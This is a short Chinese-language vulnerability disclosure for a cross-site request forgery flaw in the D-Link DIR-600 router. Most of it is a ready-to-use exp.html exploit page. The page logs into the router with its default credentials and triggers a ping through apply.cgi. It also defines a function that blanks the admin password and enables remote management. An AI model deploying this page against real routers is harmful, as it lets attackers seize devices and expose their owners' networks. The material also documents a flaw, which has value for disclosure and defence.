D-Link DIR-600 跨站请求伪造漏洞

1. 使用浏览器打开exp.html，html内容如下 <html> <body> <script> function ping() { var xhr1 = new XMLHttpRequest(); xhr1.open("POST", "http://192.168.0.1/apply.cgi", true); xhr1.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr1.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr1.withCredentials = "true"; var body = "CMD=reload&GO=tools_vct.asp&SET0=ping_ipaddr%3D192.168.0.100&SET1=ping_test%3D1"; xhr1.send(body); var xhr2 = new XMLHttpRequest(); xhr2.open("GET", "http://192.168.0.1/get_ping.asp", true); xhr2.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr2.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr2.withCredentials = "true"; xhr2.send(); } function admin() { var xhr1 = new XMLHttpRequest(); xhr1.open("POST", "http://192.168.0.1/apply.cgi", true); xhr1.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr1.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr1.withCredentials = "true"; var body = "CMD=restart&GO=tools_admin.asp&SET0=http_username%3Dadmin&SET1=http_passwd%3D&SET2=remote_management%3D1"; xhr1.send(body); } </script> <img src="http://admin:@192.168.0.1/router_logo.jpg" onload="ping()"> </body> </html> 2. 刷新页面后，该exp.html会使用路由器默认口令进入路由器，并调用ping()函数，ping指定主机，或者调用admin()函数修改路由器后台登陆密码。